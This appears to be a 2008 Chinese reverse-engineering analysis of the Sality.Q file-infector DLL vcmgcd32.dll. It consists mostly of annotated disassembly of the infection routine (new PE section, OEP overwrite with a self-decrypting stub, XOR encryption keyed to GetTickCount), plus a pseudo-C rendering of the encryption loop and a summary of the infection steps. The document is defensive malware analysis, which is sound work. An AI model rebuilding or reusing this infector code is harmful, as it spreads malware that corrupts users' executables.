100025D9 . 03C2 ADD EAX,EDX
100025DB . 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
100025DE . 6BC9 28 IMUL ECX,ECX,28
100025E1 . 030D 94E60010 ADD ECX,DWORD PTR DS:[1000E694]
100025E7 . 8D5401 18 LEA EDX,DWORD PTR DS:[ECX+EAX+18]
100025EB . 52 PUSH EDX
100025EC . E8 AF210000 CALL vcmgcd32.100047A0
100025F1 . 83C4 0C ADD ESP,0C
100025F4 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
100025F9 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240]
100025FF . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34]
10002602 . 2B05 38900010 SUB EAX,DWORD PTR DS:[10009038]
10002608 . 8945 C4 MOV DWORD PTR SS:[EBP-3C],EAX
1000260B . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000260F > 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]
10002612 . 81E1 FF000000 AND ECX,0FF
10002618 . 85C9 TEST ECX,ECX
1000261A . 0F85 45020000 JNZ vcmgcd32.10002865
10002620 . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; NumberOfSections
10002627 . 66:83C2 01 ADD DX,1 ; ++
1000262B . 66:8915 16900>MOV WORD PTR DS:[10009016],DX
10002632 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
1000263C . 833D E0900010>CMP DWORD PTR DS:[100090E0],0
10002643 . 74 4F JE SHORT vcmgcd32.10002694
10002645 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
1000264A . 50 PUSH EAX
1000264B . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002651 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
10002657 . 51 PUSH ECX
10002658 . 68 E8900010 PUSH vcmgcd32.100090E8
1000265D . E8 3E210000 CALL vcmgcd32.100047A0
10002662 . 83C4 0C ADD ESP,0C
10002665 . 8B15 E0900010 MOV EDX,DWORD PTR DS:[100090E0]
1000266B . 83C2 28 ADD EDX,28
1000266E . 8915 E0900010 MOV DWORD PTR DS:[100090E0],EDX
10002674 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
10002679 . 50 PUSH EAX
1000267A . 68 E8900010 PUSH vcmgcd32.100090E8
1000267F . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002685 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
1000268B . 51 PUSH ECX
1000268C . E8 0F210000 CALL vcmgcd32.100047A0
10002691 . 83C4 0C ADD ESP,0C
10002694 > 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
10002697 . 52 PUSH EDX ; /String
10002698 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
1000269E . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
100026A1 . 8D5401 FB LEA EDX,DWORD PTR DS:[ECX+EAX-5]
100026A5 . 52 PUSH EDX ; /StringOrChar
100026A6 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
100026AC . 0FBE05 70E200>MOVSX EAX,BYTE PTR DS:[1000E270]
100026B3 . 33C9 XOR ECX,ECX
100026B5 . 83F8 2E CMP EAX,2E
100026B8 . 0F94C1 SETE CL
100026BB . 81C1 70E20010 ADD ECX,vcmgcd32.1000E270
100026C1 . 51 PUSH ECX ; /<%s>
100026C2 . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
100026C5 . 52 PUSH EDX ; |/String
100026C6 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; |\lstrlenA
100026CC . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
100026CF . 0FBE5401 FB MOVSX EDX,BYTE PTR DS:[ECX+EAX-5] ; |
100026D4 . 52 PUSH EDX ; |<%c>
100026D5 . 68 A46A0010 PUSH vcmgcd32.10006AA4 ; |Format = ".%c%s"
100026DA . 68 30E20010 PUSH vcmgcd32.1000E230 ; |s = vcmgcd32.1000E230
100026DF . FF15 1C110010 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
100026E5 . 83C4 10 ADD ESP,10
100026E8 . 68 70E20010 PUSH vcmgcd32.1000E270 ; /String = ""
100026ED . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
100026F3 . 83F8 01 CMP EAX,1
100026F6 . 7E 30 JLE SHORT vcmgcd32.10002728
100026F8 . 0FBE05 72E200>MOVSX EAX,BYTE PTR DS:[1000E272]
100026FF . 83F8 60 CMP EAX,60
10002702 . 7E 19 JLE SHORT vcmgcd32.1000271D
10002704 . 0FBE0D 72E200>MOVSX ECX,BYTE PTR DS:[1000E272]
1000270B . 83F9 7B CMP ECX,7B
1000270E . 7D 0D JGE SHORT vcmgcd32.1000271D
10002710 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002715 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
1000271B . EB 0B JMP SHORT vcmgcd32.10002728
1000271D > 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002722 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
10002728 > 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000272E . 52 PUSH EDX ; /Arg2 => 00000000
1000272F . A1 60900010 MOV EAX,DWORD PTR DS:[10009060] ; |
10002734 . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34] ; |
10002737 . 50 PUSH EAX ; |Arg1
10002738 . E8 33F6FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000273D . 83C4 08 ADD ESP,8
10002740 . A3 3CE20010 MOV DWORD PTR DS:[1000E23C],EAX
10002745 . 8B4D CC MOV ECX,DWORD PTR SS:[EBP-34]
10002748 . 890D 38E20010 MOV DWORD PTR DS:[1000E238],ECX
1000274E . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002751 . 8915 40E20010 MOV DWORD PTR DS:[1000E240],EDX
10002757 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
1000275A . A3 44E20010 MOV DWORD PTR DS:[1000E244],EAX
1000275F . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
10002769 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
10002773 . 6A 28 PUSH 28
10002775 . 33C9 XOR ECX,ECX
10002777 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000277E . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002784 . 03D1 ADD EDX,ECX
10002786 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
10002789 . 83C0 01 ADD EAX,1
1000278C . 6BC0 28 IMUL EAX,EAX,28
1000278F . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002795 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002799 . 51 PUSH ECX
1000279A . 68 E8900010 PUSH vcmgcd32.100090E8
1000279F . E8 FC1F0000 CALL vcmgcd32.100047A0
100027A4 . 83C4 0C ADD ESP,0C
100027A7 . C745 C4 13000>MOV DWORD PTR SS:[EBP-3C],13
100027AE . 33D2 XOR EDX,EDX
100027B0 . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100027B7 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100027BD . 03C2 ADD EAX,EDX
100027BF . 33C9 XOR ECX,ECX
100027C1 . 66:8B0D 16900>MOV CX,WORD PTR DS:[10009016]
100027C8 . 6BC9 28 IMUL ECX,ECX,28
100027CB . 8B15 E4900010 MOV EDX,DWORD PTR DS:[100090E4]
100027D1 . 03D0 ADD EDX,EAX
100027D3 . 8D4411 18 LEA EAX,DWORD PTR DS:[ECX+EDX+18]
100027D7 . 3B05 64900010 CMP EAX,DWORD PTR DS:[10009064]
100027DD . 76 2D JBE SHORT vcmgcd32.1000280C
100027DF . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
100027E6 . EB 09 JMP SHORT vcmgcd32.100027F1
100027E8 > 8B4D C4 MOV ECX,DWORD PTR SS:[EBP-3C]
100027EB . 83C1 01 ADD ECX,1
100027EE . 894D C4 MOV DWORD PTR SS:[EBP-3C],ECX
100027F1 > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
100027F5 . 74 15 JE SHORT vcmgcd32.1000280C
100027F7 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
100027FA . 33C0 XOR EAX,EAX
100027FC . 66:8B0455 E89>MOV AX,WORD PTR DS:[EDX*2+100090E8]
10002804 . 85C0 TEST EAX,EAX
10002806 . 74 02 JE SHORT vcmgcd32.1000280A
10002808 . EB 02 JMP SHORT vcmgcd32.1000280C
1000280A >^ EB DC JMP SHORT vcmgcd32.100027E8
1000280C > 837D C4 13 CMP DWORD PTR SS:[EBP-3C],13
10002810 . 75 4C JNZ SHORT vcmgcd32.1000285E
10002812 . 6A 28 PUSH 28
10002814 . 68 30E20010 PUSH vcmgcd32.1000E230
10002819 . 33C9 XOR ECX,ECX
1000281B . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
10002822 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002828 . 03D1 ADD EDX,ECX
1000282A . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000282D . 83C0 01 ADD EAX,1
10002830 . 6BC0 28 IMUL EAX,EAX,28
10002833 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002839 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
1000283D . 51 PUSH ECX
1000283E . E8 5D1F0000 CALL vcmgcd32.100047A0 ; add new section
10002843 . 83C4 0C ADD ESP,0C
10002846 . 8B15 60900010 MOV EDX,DWORD PTR DS:[10009060]
1000284C . 2B55 CC SUB EDX,DWORD PTR SS:[EBP-34]
1000284F . 2B15 38900010 SUB EDX,DWORD PTR DS:[10009038]
10002855 . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002858 . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000285C . EB 07 JMP SHORT vcmgcd32.10002865
1000285E > C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002865 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002868 . 25 FF000000 AND EAX,0FF
1000286D . 85C0 TEST EAX,EAX
1000286F . 0F84 4F020000 JE vcmgcd32.10002AC4
10002875 . 837D C4 00 CMP DWORD PTR SS:[EBP-3C],0
10002879 . 0F84 45020000 JE vcmgcd32.10002AC4
1000287F . 6A 28 PUSH 28
10002881 . 33C9 XOR ECX,ECX
10002883 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
1000288A . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002890 . 03D1 ADD EDX,ECX
10002892 . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
10002898 . 6BC0 28 IMUL EAX,EAX,28
1000289B . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028A1 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028A5 . 51 PUSH ECX
100028A6 . 68 30E20010 PUSH vcmgcd32.1000E230
100028AB . E8 F01E0000 CALL vcmgcd32.100047A0
100028B0 . 83C4 0C ADD ESP,0C
100028B3 . 8B15 54E20010 MOV EDX,DWORD PTR DS:[1000E254]
100028B9 . 81E2 00000080 AND EDX,80000000
100028BF . 85D2 TEST EDX,EDX
100028C1 . 75 43 JNZ SHORT vcmgcd32.10002906
100028C3 . A1 54E20010 MOV EAX,DWORD PTR DS:[1000E254]
100028C8 . 2D 00000080 SUB EAX,80000000
100028CD . A3 54E20010 MOV DWORD PTR DS:[1000E254],EAX
100028D2 . 6A 28 PUSH 28
100028D4 . 68 30E20010 PUSH vcmgcd32.1000E230
100028D9 . 33C9 XOR ECX,ECX
100028DB . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
100028E2 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
100028E8 . 03D1 ADD EDX,ECX
100028EA . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
100028F0 . 6BC0 28 IMUL EAX,EAX,28
100028F3 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028F9 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028FD . 51 PUSH ECX
100028FE . E8 9D1E0000 CALL vcmgcd32.100047A0
10002903 . 83C4 0C ADD ESP,0C
10002906 > 68 D8000000 PUSH 0D8
1000290B . 68 10900010 PUSH vcmgcd32.10009010
10002910 . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002916 . 0395 0CFFFFFF ADD EDX,DWORD PTR SS:[EBP-F4]
1000291C . 52 PUSH EDX
1000291D . E8 7E1E0000 CALL vcmgcd32.100047A0
10002922 . 83C4 0C ADD ESP,0C
10002925 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
10002928 . 0345 CC ADD EAX,DWORD PTR SS:[EBP-34]
1000292B . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
1000292E . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C] ; write new section data
10002934 . 51 PUSH ECX ; /Arg2 => 00000000
10002935 . 8B55 B0 MOV EDX,DWORD PTR SS:[EBP-50] ; |
10002938 . 52 PUSH EDX ; |Arg1
10002939 . E8 32F4FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000293E . 83C4 08 ADD ESP,8
10002941 . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
10002944 . 6A 01 PUSH 1 ; /Arg2 = 00000001
10002946 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
1000294B . E8 C0F5FFFF CALL vcmgcd32.10001F10 ; \vcmgcd32.10001F10
10002950 . 83C4 08 ADD ESP,8
10002953 . 6A 7B PUSH 7B ; save original OEP 7B bytes
10002955 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
1000295A . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
10002960 . 50 PUSH EAX
10002961 . 68 70E20010 PUSH vcmgcd32.1000E270
10002966 . E8 351E0000 CALL vcmgcd32.100047A0
/*
100047A0_fun(pDest, pSrc, dwLen);
*/
1000296B . 83C4 0C ADD ESP,0C
1000296E . 6A 7B PUSH 7B ; save to another mem
10002970 . 68 70E20010 PUSH vcmgcd32.1000E270
10002975 . 68 76960010 PUSH vcmgcd32.10009676
1000297A . E8 211E0000 CALL vcmgcd32.100047A0
1000297F . 83C4 0C ADD ESP,0C
10002982 . 6A 7B PUSH 7B ; write new 7B bytes overwrite OEP
10002984 . 8D8D 30FFFFFF LEA ECX,DWORD PTR SS:[EBP-D0]
1000298A . 51 PUSH ECX
1000298B . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002991 . 0395 18FFFFFF ADD EDX,DWORD PTR SS:[EBP-E8]
10002997 . 52 PUSH EDX
10002998 . E8 031E0000 CALL vcmgcd32.100047A0
1000299D . 83C4 0C ADD ESP,0C
100029A0 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100029AA . EB 0F JMP SHORT vcmgcd32.100029BB
100029AC > 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC] ; ???????? cf, D0 offset's data equal 11h
100029B2 . 83C0 01 ADD EAX,1
100029B5 . 8985 14FFFFFF MOV DWORD PTR SS:[EBP-EC],EAX
100029BB > 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],7C
100029C2 . 73 2A JNB SHORT vcmgcd32.100029EE
100029C4 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100029CA . 0FBE940D 30FF>MOVSX EDX,BYTE PTR SS:[EBP+ECX-D0]
100029D2 . 83FA 11 CMP EDX,11
100029D5 . 75 15 JNZ SHORT vcmgcd32.100029EC
100029D7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100029DD . 0FBE8C05 31FF>MOVSX ECX,BYTE PTR SS:[EBP+EAX-CF]
100029E5 . 83F9 11 CMP ECX,11
100029E8 . 75 02 JNZ SHORT vcmgcd32.100029EC
100029EA . EB 02 JMP SHORT vcmgcd32.100029EE
100029EC >^ EB BE JMP SHORT vcmgcd32.100029AC
100029EE > 6A 04 PUSH 4
100029F0 . 8D55 C4 LEA EDX,DWORD PTR SS:[EBP-3C]
100029F3 . 52 PUSH EDX
100029F4 . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
100029FA . 0385 14FFFFFF ADD EAX,DWORD PTR SS:[EBP-EC]
10002A00 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A06 . 03C8 ADD ECX,EAX
10002A08 . 51 PUSH ECX
10002A09 . E8 921D0000 CALL vcmgcd32.100047A0
10002A0E . 83C4 0C ADD ESP,0C
10002A11 . FF15 30100010 CALL DWORD PTR DS:[<&KERNEL32.GetTickCount>] ; [GetTickCount
10002A17 . 0345 B8 ADD EAX,DWORD PTR SS:[EBP-48]
10002A1A . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002A1D . 6BC0 03 IMUL EAX,EAX,3
10002A20 . 66:8945 B4 MOV WORD PTR SS:[EBP-4C],AX ; get the random encryption/decryption factor
10002A24 . 6A 02 PUSH 2
10002A26 . 8D55 B4 LEA EDX,DWORD PTR SS:[EBP-4C]
10002A29 . 52 PUSH EDX
10002A2A . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
10002A30 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A36 . 8D5401 77 LEA EDX,DWORD PTR DS:[ECX+EAX+77] ; write the encryption/decryption factor at OEP+77h
10002A3A . 52 PUSH EDX
10002A3B . E8 601D0000 CALL vcmgcd32.100047A0
10002A40 . 83C4 0C ADD ESP,0C
10002A43 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],2800 ; decode O_OEP data
10002A4D . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002A54 > 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C] ; encryption/decryption factor
10002A57 . 25 FFFF0000 AND EAX,0FFFF
10002A5C . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A62 . 0FAFC8 IMUL ECX,EAX
10002A65 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
10002A6B . D1E2 SHL EDX,1
10002A6D . 2BCA SUB ECX,EDX
10002A6F . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A72 . 66:8B1445 E89>MOV DX,WORD PTR DS:[EAX*2+100090E8]
10002A7A . 66:33D1 XOR DX,CX
10002A7D . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A80 . 66:891445 E89>MOV WORD PTR DS:[EAX*2+100090E8],DX
10002A88 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A8E . 83E9 01 SUB ECX,1
10002A91 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
10002A97 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
10002A9A . 83C2 01 ADD EDX,1
10002A9D . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002AA0 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],0
10002AA7 .^ 75 AB JNZ SHORT vcmgcd32.10002A54
/* Encryption algorithm
dwEC = 0x2800;
dw3C = 0;
LOOP1:
dwEax = dw4C;   // encryption/decryption factor
dwEax = dwEax AND 0xFFFF;
dwEcx = dwEC;
dwEcx *= dwEax;
dwEdx = dwEC;
dwEdx = dwEdx << 1;
dwEcx -= dwEdx;
dwEax = dw3C;
dwEdx = [100090E8 + dwEax * 2];
dwDx = dwDx XOR dwCX;
dwEax = dw3C;
[100090E8 + dwEax * 2] = dwDx;
dwEcx = dwEC;
dwEcx--;
dwEC = dwEcx;
dwEdx = dw3C;
dwEdx++;
dw3C = dwEdx;
if dwEC != 0 then
goto LOOP1;
*/
10002AA9 . 68 00500000 PUSH 5000
10002AAE . 68 E8900010 PUSH vcmgcd32.100090E8
10002AB3 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002AB8 . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002ABB . 50 PUSH EAX
10002ABC . E8 DF1C0000 CALL vcmgcd32.100047A0 ; rewrite the last section's data
10002AC1 . 83C4 0C ADD ESP,0C
10002AC4 > 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002ACA . 51 PUSH ECX ; /BaseAddress => NULL
10002ACB . FF15 78100010 CALL DWORD PTR DS:[<&KERNEL32.UnmapViewOfFile>] ; \UnmapViewOfFile
10002AD1 . 8B15 10E20010 MOV EDX,DWORD PTR DS:[1000E210]
10002AD7 . 52 PUSH EDX ; /hObject => NULL
10002AD8 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002ADE . 6A 00 PUSH 0 ; /Origin = FILE_BEGIN
10002AE0 . 6A 00 PUSH 0 ; |pOffsetHi = NULL
10002AE2 . 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50] ; |
10002AE5 . 50 PUSH EAX ; |OffsetLo
10002AE6 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
10002AEC . 51 PUSH ECX ; |hFile
10002AED . FF15 88100010 CALL DWORD PTR DS:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
10002AF3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC]
10002AF9 . 52 PUSH EDX ; /hFile
10002AFA . FF15 84100010 CALL DWORD PTR DS:[<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
10002B00 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
10002B06 . 50 PUSH EAX ; /pLastWrite
10002B07 . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
10002B0A . 51 PUSH ECX ; |pLastAccess
10002B0B . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
10002B0E . 52 PUSH EDX ; |pCreationTime
10002B0F . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
10002B15 . 50 PUSH EAX ; |hFile
10002B16 . FF15 F8100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; \SetFileTime
10002B1C > 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC]
10002B22 . 51 PUSH ECX ; /hObject
10002B23 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002B29 . 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]
10002B2C . 52 PUSH EDX ; /FileAttributes
10002B2D . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002B30 . 50 PUSH EAX ; |FileName
10002B31 . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002B37 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B3E . EB 10 JMP SHORT vcmgcd32.10002B50
10002B40 . B8 01000000 MOV EAX,1
10002B45 . C3 RETN
10002B46 . 8B65 E8 MOV ESP,DWORD PTR SS:[EBP-18]
10002B49 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B50 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002B53 . 25 FF000000 AND EAX,0FF
10002B58 > 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
10002B5B . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
10002B62 . 5F POP EDI
10002B63 . 5E POP ESI
10002B64 . 5B POP EBX
10002B65 . 8BE5 MOV ESP,EBP
10002B67 . 5D POP EBP
10002B68 . C3 RETN
3. Repair program demo:
RepairSalityQ.rar
* 文件名:vcmgcd32.dll
* MD5:ae22ca9f11ade8e362254b452cc07f78
* 壳:未加
* By Vincent.peng on 2008.04.08
*/
调试方法:
在Fun为10003FF0的CreateThread断下,然后转EIP到10003FF0处。
一、感染过程分析:
1 保存文件属性、时间。
2 设置文件属性为文档。
3 得到文件大小:
感染1000B ~ 1400000B之间的exe文件。
4 计算出OEP的文件偏移地址。
5 修改PE头、节表:
1) 修改NtHeaders->OptionalHeader.SizeOfImage、NtHeaders->FileHeader.NumberOfSections。
2) 新增一节表头:节名为文件名(去扩展名)的最后一字符与code, 或date, 或rdate, 或text, 或UPX等字符串的组合。
6 申请一段内存空间保存原始OEP(7B字节)和新增加节的数据内容,并用随机因子加密。
7 用自解密算法(7B字节)替换原OEP开始的7B个字节。
8 将新节追加到文件尾部。
9 还原文件属性、时间。
此变种有个BUG,就是被感染的程序无法运行。因为被感染文件运行、自解密后,没有还原原始OEP及JMP的代码。
二、感染代码:
10002020 $ 55 PUSH EBP
10002021 . 8BEC MOV EBP,ESP
10002023 . 6A FF PUSH -1
10002025 . 68 58110010 PUSH vcmgcd32.10001158
1000202A . 68 48460010 PUSH vcmgcd32.10004648 ; SE 处理程序安装
1000202F . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
10002035 . 50 PUSH EAX
10002036 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
1000203D . 81C4 08FFFFFF ADD ESP,-0F8
10002043 . 53 PUSH EBX
10002044 . 56 PUSH ESI
10002045 . 57 PUSH EDI
10002046 . 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
10002049 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
10002053 . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
1000205A . C785 10FFFFFF>MOV DWORD PTR SS:[EBP-F0],0
10002064 . C785 24FFFFFF>MOV DWORD PTR SS:[EBP-DC],0
1000206E . C785 18FFFFFF>MOV DWORD PTR SS:[EBP-E8],0
10002078 . C745 AC 00000>MOV DWORD PTR SS:[EBP-54],0
1000207F . C785 2CFFFFFF>MOV DWORD PTR SS:[EBP-D4],0
10002089 . C785 08FFFFFF>MOV DWORD PTR SS:[EBP-F8],0
10002093 . C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],0
1000209A . C745 E0 00000>MOV DWORD PTR SS:[EBP-20],0
100020A1 . C745 CC 00500>MOV DWORD PTR SS:[EBP-34],5000
100020A8 . 66:C745 B4 00>MOV WORD PTR SS:[EBP-4C],0
100020AE . B9 1F000000 MOV ECX,1F
100020B3 . BE 286A0010 MOV ESI,vcmgcd32.10006A28
100020B8 . 8DBD 30FFFFFF LEA EDI,DWORD PTR SS:[EBP-D0]
100020BE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
100020C0 . C645 DC 00 MOV BYTE PTR SS:[EBP-24],0
100020C4 . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
100020CB . 833D 048B0010>CMP DWORD PTR DS:[10008B04],0
100020D2 . 74 47 JE SHORT vcmgcd32.1000211B
100020D4 . 68 04010000 PUSH 104 ; /WideBufSize = 104 (260.)
100020D9 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |WideCharBuf = vcmgcd32.1000E270
100020DE . 6A FF PUSH -1 ; |StringSize = FFFFFFFF (-1.)
100020E0 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
100020E3 . 50 PUSH EAX ; |StringToMap
100020E4 . 6A 00 PUSH 0 ; |Options = 0
100020E6 . 6A 00 PUSH 0 ; |CodePage = CP_ACP
100020E8 . FF15 98100010 CALL DWORD PTR DS:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
100020EE . 68 70E20010 PUSH vcmgcd32.1000E270
100020F3 . 6A 00 PUSH 0
100020F5 . FF15 048B0010 CALL DWORD PTR DS:[10008B04] ; sfc_os.SfcIsFileProtected
100020FB . 85C0 TEST EAX,EAX
100020FD . 74 1C JE SHORT vcmgcd32.1000211B
100020FF . C785 00FFFFFF>MOV DWORD PTR SS:[EBP-100],0
10002109 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002110 . 8B85 00FFFFFF MOV EAX,DWORD PTR SS:[EBP-100]
10002116 . E9 3D0A0000 JMP vcmgcd32.10002B58
1000211B > 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
1000211E . 51 PUSH ECX ; /FileName
1000211F . FF15 3C100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
10002125 . 8945 D8 MOV DWORD PTR SS:[EBP-28],EAX
10002128 . 6A 20 PUSH 20 ; /FileAttributes = ARCHIVE
1000212A . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
1000212D . 52 PUSH EDX ; |FileName
1000212E . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002134 . 85C0 TEST EAX,EAX
10002136 . 75 1C JNZ SHORT vcmgcd32.10002154
10002138 . C785 FCFEFFFF>MOV DWORD PTR SS:[EBP-104],0
10002142 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002149 . 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104]
